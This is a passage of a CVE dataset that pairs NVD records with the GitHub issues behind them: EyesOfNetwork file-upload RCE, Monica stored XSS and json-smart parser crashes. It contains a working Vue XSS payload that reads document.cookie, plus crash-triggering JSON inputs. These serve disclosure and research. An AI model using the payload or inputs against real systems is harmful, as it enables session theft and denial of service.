"url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/87"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ArianeBlow/exploit-eyesofnetwork5.3.10/blob/main/PoC-BruteForceID-arbitraty-file-upload-RCE-PrivEsc.py"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/87"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-10:*:*:*:*:*:*:*",
"matchCriteriaId": "74EF3A57-69B9-4E5F-9E04-0273F5A011F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/EyesOfNetworkCommunity/eonweb/issues/87 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"EyesOfNetworkCommunity",
"eonweb"
] | Bonjour,
En testant la version 5.3-10, je me suis rendu compte qu'il était possible d'uploader n'importe quel type de file en bypassant le filtre userside dans le module admin_ITSM, j'ai pu ainsi uploader un shell PHP en le nomant machin.xml.php via interception et modification de la requête.
Une demande d'enregistrement MITRE a été faite incluant le brut-force de session_ID, ce qui donne un RCE non authentifié sur la version 5.3-10 (je sais que vous avez chiffré les sessions_ID en MD5 dans un commit pour la futur version, j'ai bien peur que cela ne serve pas a grand chose, il suffit de chiffrer les sessions_ID également dans le brut-force :( ).
Je vous encourage à inclure des modalités de sécurités dans le projet github ou une addresse de contact sur le site, parce que devoir mettre ca ici c'est un poil risky mais il n'y a pas vraiment le choix. | Arbitrary file upload & RCE | https://api.github.com/repos/EyesOfNetworkCommunity/eonweb/issues/87/comments | 6 | 2021-02-21T07:41:32Z | 2021-03-18T10:11:05Z | https://github.com/EyesOfNetworkCommunity/eonweb/issues/87 | 812,796,100 | 87 | 1,715 |
CVE-2021-27368 | 2021-02-22T15:15:12.677 | The Contact page in Monica 2.19.1 allows stored XSS via the First Name field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/monicahq/monica/issues/4888"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/monicahq/monica/pull/4543"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/monicahq/monica/issues/4888"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/monicahq/monica/pull/4543"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:monicahq:monica:2.19.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E3CE0D8A-8910-46A7-BE3C-E4F44C09042F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/monicahq/monica/issues/4888 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"monicahq",
"monica"
] | Hi there,
I'm using the latest version of Monica PRM web application 2.19.1, deployed on my local Ubuntu machine. I would like to report to you the existing of Cross Site Scripting Vulnerability in the Contact Page.
The following fields of the Contact object can be used to host a stored XSS ( First name, Middle name, Last name, Nickname & Description ) and will be triggered each time you browse the contact webpage or trying to edit the details.
This happen because of the way that Vue.js do render the webpage and executing the XSS payload in the vulnerable fields.
the payload used in the POC:
`{{ constructor.constructor("alert(document.cookie)")() }}`

To mitigate this issue different safeguards can be implemented, please refer to this website for more details:
https://github.com/dotboris/vuejs-serverside-template-xss
Regards, | Security Issue - XSS | https://api.github.com/repos/monicahq/monica/issues/4888/comments | 3 | 2021-02-18T10:29:23Z | 2022-05-02T00:05:09Z | https://github.com/monicahq/monica/issues/4888 | 810,967,891 | 4,888 | 1,716 |
CVE-2021-27568 | 2021-02-23T02:15:12.887 | An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v1/issues/7"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v2/issues/60"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v1/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v2/issues/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v1:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CF4BCC9F-24C9-4BA3-84D2-F31A3B473F34",
"versionEndExcluding": "1.3.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCD2A223-7D65-4A73-A810-3EA9A1FC6027",
"versionEndExcluding": "2.3.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72EE4B3C-E1F2-4370-B42E-AC7E58651690",
"versionEndExcluding": "2.4.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4479F76A-4B67-41CC-98C7-C76B81050F8E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71CB79ED-A93E-4CBD-BCDD-82C5A00B373B",
"versionEndExcluding": "2.12.42",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*",
"matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*",
"matchCriteriaId": "C8AF00C6-B97F-414D-A8DF-057E6BFD8597",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3F906F04-39E4-4BE4-8A73-9D058AAADB43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7B393A82-476A-4270-A903-38ED4169E431",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"754"
] | 754 | https://github.com/netplex/json-smart-v1/issues/7 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"netplex",
"json-smart-v1"
] | The parser fails to throw the ParseException when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial-of-Service (DoS).
https://github.com/netplex/json-smart-v1/blob/51e1641ec53d3066c79f1db542a6bb4b5387039d/json-smart/src/main/java/net/minidev/json/parser/JSONParserBase.java#L134-L142
Parser Input of "-." or "2e+" or "[45e-" will crash with a NumberFormatException.
```
== Java Exception: java.lang.NumberFormatException: For input string: "-."
at java.base/jdk.internal.math.FloatingDecimal.readJavaFormatString(FloatingDecimal.java:2054)
at java.base/jdk.internal.math.FloatingDecimal.parseDouble(FloatingDecimal.java:110)
at java.base/java.lang.Double.parseDouble(Double.java:549)
at net.minidev.json.parser.JSONParserBase.extractFloat(JSONParserBase.java:141)
at net.minidev.json.parser.JSONParserMemory.readNumber(JSONParserMemory.java:81)
at net.minidev.json.parser.JSONParserBase.readMain(JSONParserBase.java:379)
at net.minidev.json.parser.JSONParserBase.parse(JSONParserBase.java:156)
at net.minidev.json.parser.JSONParserString.parse(JSONParserString.java:56)
at net.minidev.json.parser.JSONParserString.parse(JSONParserString.java:37)
at net.minidev.json.parser.JSONParser.parse(JSONParser.java:140)
``` | Uncaught Exception in Parser | https://api.github.com/repos/netplex/json-smart-v1/issues/7/comments | 2 | 2021-02-22T21:10:21Z | 2021-04-04T14:28:24Z | https://github.com/netplex/json-smart-v1/issues/7 | 813,866,347 | 7 | 1,717 |
CVE-2021-27568 | 2021-02-23T02:15:12.887 | An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v1/issues/7"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v2/issues/60"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v1/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/netplex/json-smart-v2/issues/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v1:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CF4BCC9F-24C9-4BA3-84D2-F31A3B473F34",
"versionEndExcluding": "1.3.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCD2A223-7D65-4A73-A810-3EA9A1FC6027",
"versionEndExcluding": "2.3.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72EE4B3C-E1F2-4370-B42E-AC7E58651690",
"versionEndExcluding": "2.4.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.14.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4479F76A-4B67-41CC-98C7-C76B81050F8E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71CB79ED-A93E-4CBD-BCDD-82C5A00B373B",
"versionEndExcluding": "2.12.42",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*",
"matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*",
"matchCriteriaId": "C8AF00C6-B97F-414D-A8DF-057E6BFD8597",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3F906F04-39E4-4BE4-8A73-9D058AAADB43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7B393A82-476A-4270-A903-38ED4169E431",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"754"
] | 754 | https://github.com/netplex/json-smart-v2/issues/60 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"netplex",
"json-smart-v2"
] | The parser fails to throw the ParseException when the parser expects the input to be of the float number type AND the input not being a valid number. This can lead to uncaught exceptions by unexpected input, which may lead to Denial-of-Service (DoS).
https://github.com/netplex/json-smart-v2/blob/4402bae12ada8009502b3da5b0d76a2bdac86cec/json-smart/src/main/java/net/minidev/json/parser/JSONParserBase.java#L139-L147
Parser Input of "-." or "2e+" or "[45e-" will crash with a NumberFormatException.
```
== Java Exception: java.lang.NumberFormatException: For input string: "-."
at java.base/jdk.internal.math.FloatingDecimal.readJavaFormatString(FloatingDecimal.java:2054)
at java.base/jdk.internal.math.FloatingDecimal.parseDouble(FloatingDecimal.java:110)
at java.base/java.lang.Double.parseDouble(Double.java:549)
at net.minidev.json.parser.JSONParserBase.extractFloat(JSONParserBase.java:141)
``` | Uncaught Exception in Parser | https://api.github.com/repos/netplex/json-smart-v2/issues/60/comments | 8 | 2021-02-22T21:44:52Z | 2021-04-26T08:06:57Z | https://github.com/netplex/json-smart-v2/issues/60 | 813,889,987 | 60 | 1,718 |
CVE-2021-26926 | 2021-02-23T18:15:14.053 | A flaw was found in jasper before 2.0.25. An out of bounds read issue was found in jp2_decode function whic may lead to disclosure of information or program crash. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/commit/41f214b121b837fa30d9ca5f2430212110f5cd9b"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/264"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSXESYUHMO522Z3RHXOQ2SJNWP3XTO67/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JYVCFVTVPL66OS7LCNLUSYCMYQAVWXMM/"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRZFZSJ4UVLLMXSKHR455TAC2SD3TOHI/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/commit/41f214b121b837fa30d9ca5f2430212110f5cd9b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/264"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JSXESYUHMO522Z3RHXOQ2SJNWP3XTO67/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JYVCFVTVPL66OS7LCNLUSYCMYQAVWXMM/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRZFZSJ4UVLLMXSKHR455TAC2SD3TOHI/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jasper_project:jasper:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F4472E5-259B-44B7-AAC5-93765989D527",
"versionEndExcluding": "2.0.25",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
